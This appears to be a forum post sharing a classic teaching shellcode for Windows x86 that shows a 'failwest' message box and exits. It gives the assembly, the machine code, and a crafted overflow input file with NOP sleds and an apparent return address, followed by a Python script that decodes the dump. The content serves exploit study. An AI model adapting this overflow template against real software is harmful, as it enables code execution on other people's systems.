Saw a very nice piece of shellcode online; posting it here to get the discussion going!
sub sp,0x440
xor ebx,ebx
push ebx
push 0x74736577
push 0x6c696166
mov eax,esp
push ebx
push eax
push eax
push ebx
mov eax,0x76F5FD1E
call eax // MessageBoxA (modify this address)
push ebx
mov eax,0x76BC79D8
call eax // exit(0) (modify this address)
Resulting machine code:
013E13CC 66:81EC 4004 sub sp, 440
013E13D1 33DB xor ebx, ebx
013E13D3 53 push ebx
013E13D4 68 77657374 push 74736577
013E13D9 68 6661696C push 6C696166
013E13DE 8BC4 mov eax, esp
013E13E0 53 push ebx
013E13E1 50 push eax
013E13E2 50 push eax
013E13E3 53 push ebx
013E13E4 B8 1EFDF576 mov eax, USER32.MessageBoxA
013E13E9 FFD0 call eax
013E13EB 53 push ebx
013E13EC B8 D879BC76 mov eax, kernel32.ExitProcess
013E13F1 FFD0 call eax
Written into the crafted txt file, it is:
00000000h: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ; ................
00000010h: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ; ................
00000020h: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ; ................
00000030h: 90 90 90 90 90 90 90 90 90 90 90 90 4F AE F8 76 ; ............O..v
00000040h: 33 DB 53 68 77 65 73 74 68 66 61 69 6C 8B C4 53 ; 3.Shwesthfail..S
00000050h: 50 50 53 B8 1E FD F5 76 FF D0 53 B8 D8 79 BC 76 ; PPS....v..S..y.v
00000060h: FF D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ; ................
00000070h: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ; ................
00000080h: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ; ...............
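An added Python example (not part of the original post) that reads the hex dump above back into bytes, flags the 0x90 NOP-sled runs, and decodes the push/mov immediates the shellcode is built from: the pushed text reassembles to the stack string "failwest", and the two mov eax values are the absolute USER32/kernel32 addresses the post says must be modified. The HEXDUMP sample is constructed from the payload lines above.

```python
import re

# Constructed sample: the payload lines of the hex dump above (offset and
# hex columns only; the parser drops the ASCII column anyway).
HEXDUMP = """\
00000030h: 90 90 90 90 90 90 90 90 90 90 90 90 4F AE F8 76
00000040h: 33 DB 53 68 77 65 73 74 68 66 61 69 6C 8B C4 53
00000050h: 50 50 53 B8 1E FD F5 76 FF D0 53 B8 D8 79 BC 76
00000060h: FF D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90
"""

def parse_hexdump(text: str) -> bytes:
    """Turn 'offset: hh hh ... ; ascii' lines back into raw bytes."""
    out = bytearray()
    for line in text.splitlines():
        hex_part = line.split(":", 1)[1].split(";", 1)[0]
        out += bytes.fromhex(hex_part)  # fromhex ignores whitespace
    return bytes(out)

def nop_sleds(buf: bytes, min_len: int = 8) -> list:
    """(offset, length) of every run of 0x90 at least min_len bytes long."""
    return [(m.start(), len(m.group()))
            for m in re.finditer(b"\x90{%d,}" % min_len, buf)]

def scan_immediates(buf: bytes) -> list:
    """Linear sweep for the two imm32 opcodes the shellcode relies on:
    68 = push imm32, B8 = mov eax, imm32. Four printable pushed bytes are
    reported as text, anything else as a little-endian value (here the
    absolute API addresses that tie the payload to one DLL build)."""
    found, i = [], 0
    while i + 5 <= len(buf):
        op = buf[i]
        if op not in (0x68, 0xB8):
            i += 1
            continue
        imm = buf[i + 1:i + 5]
        entry = {"offset": i, "mnemonic": "push" if op == 0x68 else "mov eax"}
        if op == 0x68 and all(0x20 <= b < 0x7F for b in imm):
            entry["text"] = imm.decode("ascii")
        else:
            entry["value"] = int.from_bytes(imm, "little")
        found.append(entry)
        i += 5
    return found

def pushed_string(entries: list) -> str:
    """Later pushes land at lower addresses: reverse the push order to read
    the stack string the way MessageBoxA sees it (here "failwest")."""
    return "".join(reversed([e["text"] for e in entries if "text" in e]))
```

`scan_immediates(parse_hexdump(HEXDUMP))` reports the two pushes and the two hard-coded addresses; the four bytes at offset 0x3C are raw data rather than an opcode, so this sweep deliberately leaves them undecoded.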